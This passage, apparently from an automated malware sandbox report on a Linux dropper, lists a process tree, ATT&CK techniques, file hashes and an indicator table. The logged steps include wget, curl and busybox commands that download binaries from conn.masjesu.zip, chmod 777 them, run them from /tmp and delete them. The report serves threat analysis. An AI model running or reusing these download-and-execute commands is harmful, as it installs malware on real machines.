  ./JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  - Executes dropped EXE
  PID:973
- /bin/rm
  rm JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
  2⤵
  PID:974
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  - System Network Configuration Discovery
  PID:975
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:976
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  PID:978
- /bin/chmod
  chmod 777 bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  - File and Directory Permissions Modification
  PID:979
- /tmp/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  ./bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  - Executes dropped EXE
  PID:980
- /bin/rm
  rm bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
  2⤵
  PID:981
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  - System Network Configuration Discovery
  PID:982
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:983
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  - System Network Configuration Discovery
  PID:985
- /bin/chmod
  chmod 777 gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  - File and Directory Permissions Modification
  PID:986
- /tmp/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  ./gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  - Executes dropped EXE
  PID:987
- /bin/rm
  rm gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
  2⤵
  PID:988
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  - System Network Configuration Discovery
  PID:989
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:990
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  - System Network Configuration Discovery
  PID:992
- /bin/chmod
  chmod 777 BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  - File and Directory Permissions Modification
  PID:993
- /tmp/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  ./BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  - Executes dropped EXE
  PID:994
- /bin/rm
  rm BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
  2⤵
  PID:995
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  PID:996
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:997
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  PID:999
- /bin/chmod
  chmod 777 VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  - File and Directory Permissions Modification
  PID:1000
- /tmp/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  ./VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  - Executes dropped EXE
  PID:1001
- /bin/rm
  rm VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
  2⤵
  PID:1002
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  - System Network Configuration Discovery
  PID:1003
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1004
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  PID:1006
- /bin/chmod
  chmod 777 qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  - File and Directory Permissions Modification
  PID:1007
- /tmp/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  ./qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  - Executes dropped EXE
  PID:1008
- /bin/rm
  rm qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
  2⤵
  PID:1009
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  - System Network Configuration Discovery
  PID:1010
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1011
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  PID:1013
- /bin/chmod
  chmod 777 0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  - File and Directory Permissions Modification
  PID:1014
- /tmp/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  ./0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  - Executes dropped EXE
  PID:1015
- /bin/rm
  rm 0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
  2⤵
  PID:1016

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN	748	inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
/tmp/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt	755	JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
/tmp/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD	776	bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
/tmp/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ	808	gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
/tmp/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR	824	BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
/tmp/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f	844	VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
/tmp/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx	868	qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
/tmp/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt	875	0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt
/tmp/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG	882	yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
/tmp/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn	889	JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
/tmp/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG	896	xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
/tmp/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE	903	LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
/tmp/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw	910	fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
/tmp/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV	917	D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
/tmp/yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG	924	yh4SEB6T7hgrZToIzCifLAvNzMka2L0BuG
/tmp/JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn	931	JzC9S3WO8uZ7T0YsiacEoszEIlh32sE4bn
/tmp/xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG	938	xzK3RAAgOi7v2J1Sl9eq4ezyn18zO9oUVG
/tmp/LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE	945	LS6yAtQktpGffFXRvFxKmaEw9OOEjm4WZE
/tmp/fynl7Kt57ij189WCinSijaNwR9GwlcDkhw	952	fynl7Kt57ij189WCinSijaNwR9GwlcDkhw
/tmp/D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV	959	D5oD2nmbHjCC9a5BUy34FYMwQfxAB3vjFV
/tmp/inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN	966	inBdSWBbxEdC3gWuWduPoeOix7iTUiCFWN
/tmp/JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt	973	JSiCtNJtqrSqqIE5CpcbDVZpk3Tdq8h8Tt
/tmp/bkC8W18n964byyBH0QzV45ARmYhYhuSvcD	980	bkC8W18n964byyBH0QzV45ARmYhYhuSvcD
/tmp/gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ	987	gYJhg3oJooGarpBxHPFJyLqK58boPDIeVQ
/tmp/BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR	994	BPjMES3X2xzsDOcMHHoGIwiyuEul7xL9UR
/tmp/VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f	1001	VwyYhxx6yNFN1r6n6nMdCITPOhN9ESRi7f
/tmp/qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx	1008	qD4LIrgL6RbdB667uxeInRlO08OjdkkbIx
/tmp/0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt	1015	0tQ9ODXZK1Wmq0rV3cEL4BMCaGj8er5Qgt